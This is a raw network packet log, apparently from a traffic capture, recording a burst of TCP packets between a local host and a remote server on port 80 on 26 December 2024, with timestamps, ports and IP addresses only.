Dec 26, 2024 13:01:55.508038998 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.512427092 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.512732983 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.513052940 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.517740011 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.518371105 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.519334078 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.522811890 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.523297071 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.526388884 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.528026104 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.528167009 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.528409958 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.533261061 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.533346891 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.533407927 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.538726091 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.538886070 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.538989067 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.543673992 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.543807983 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.543872118 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.548940897 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.549324036 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.549388885 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.554024935 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.554167986 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.554233074 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.559278011 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.559484005 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.559535027 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.564418077 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.606098890 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.666893959 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.667088032 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.667234898 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.668983936 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.669389009 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.669441938 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.673193932 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.673441887 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.673567057 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.677408934 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.677933931 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.678010941 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.681457996 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.681513071 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.681555033 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.685502052 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.685681105 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.685733080 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.689429045 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.689630032 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.689800978 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.693315983 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.693414927 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.693494081 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.697199106 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.697339058 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.697467089 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.701052904 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.701515913 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.701575041 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.704864979 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.705008030 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.705085039 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.708669901 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.708986998 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.709041119 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.712588072 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.712749004 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.712819099 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.716381073 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.716739893 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.716893911 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.720249891 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.720349073 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.720398903 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.724189043 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.724421024 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.724481106 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.727914095 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.728488922 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.728580952 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.731760979 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.732016087 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.732285976 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.735589027 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.735841036 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.736123085 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.739442110 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.739610910 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.739721060 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.743269920 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.743405104 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.743479013 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.747195959 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.747538090 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.747658014 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.751039028 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.751307011 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.751365900 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.754827023 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.754915953 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.755043983 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.758694887 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.759393930 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.759449959 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.762491941 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.762716055 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.762882948 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.766345024 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.766664982 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.766714096 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.770157099 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.770363092 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.770454884 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.773998022 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.774266005 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.774338961 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.777981997 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.778179884 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.778250933 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.781687021 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.782285929 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.782375097 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.785527945 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.785697937 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.785943985 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.789376974 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.789556026 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.789625883 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.793209076 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.793293953 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.793356895 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.877377987 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.877424002 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.877490044 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.878693104 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.879236937 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.879344940 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.879729033 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.882010937 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.882054090 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.882112980 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.884835958 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.884907961 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.885431051 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.894501925 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.894522905 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.894537926 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.894570112 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.894608021 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.894620895 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.894629002 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.894634962 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.894660950 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.895821095 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.895863056 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.896214962 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.898487091 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.898567915 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.898895025 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.901089907 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.901175022 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.901424885 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.903546095 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.903625965 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.904716015 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.905910969 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.906001091 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.906517982 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.908418894 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.908497095 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.908684969 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.910938978 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.911031961 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.911134005 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.913279057 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.913346052 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.914016008 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.915875912 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.915920973 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.916127920 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.918100119 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.918112040 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.918159008 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.920475960 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.920578957 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.920579910 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.922828913 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.922847986 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.922888041 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.925327063 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.925378084 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.926315069 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.927589893 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.927670956 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.927731991 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.929939985 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.930016041 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.930200100 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.932229042 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.932279110 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.932665110 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.935219049 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.935302019 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.936119080 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.937063932 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.937134027 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.937705040 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.939318895 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.939424038 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.939722061 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.941592932 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.941668034 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.941760063 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.944144011 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.944201946 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.944688082 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.946299076 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.946378946 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.946934938 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.948760986 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.948848009 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.948875904 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.951369047 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.951468945 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.951597929 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.953522921 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.953603029 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.953963995 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.955776930 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.955866098 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.956413984 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.958122015 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.958215952 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.958328962 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.960438967 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.960505009 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.960581064 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.962847948 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.962873936 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.962937117 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.965179920 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.965230942 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.965323925 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.967569113 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.967684984 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.968406916 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.969851017 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.969974041 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.970010996 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.972209930 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.972224951 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.972274065 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.974591970 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.974730968 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.974828959 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.976932049 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.977001905 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.977065086 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.979274988 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.979345083 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.979604959 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.981626987 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.981733084 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.982026100 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.984082937 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.984172106 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.984313011 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.986367941 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.986474991 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.986640930 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.988910913 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.989001989 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.989026070 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.991096973 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.991189003 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.991359949 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.993451118 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.993535995 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.993582010 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.995784998 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.995868921 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.996330023 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.998155117 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:55.998258114 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:55.998608112 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.000819921 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.000870943 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.000880003 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.043664932 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.088217974 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.088321924 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.088488102 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.089123011 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.089396000 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.089543104 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.090637922 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.090811968 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.090871096 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.092238903 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.092773914 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.092842102 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.093956947 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.094206095 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.095133066 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.095417023 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.096041918 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.097029924 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.097177982 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.097429991 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.098505020 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.098604918 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.098658085 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.099334002 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.100047112 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.100482941 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.100533962 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.101589918 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.101723909 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.101782084 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.103120089 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.103326082 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.104644060 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.104711056 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.104763985 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.106159925 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.106268883 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.106421947 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.106539011 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.107620001 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.108217955 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.108299017 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.109134912 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.109487057 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.109605074 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.110806942 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.110923052 CET	80	49743	185.215.113.16	192.168.2.5
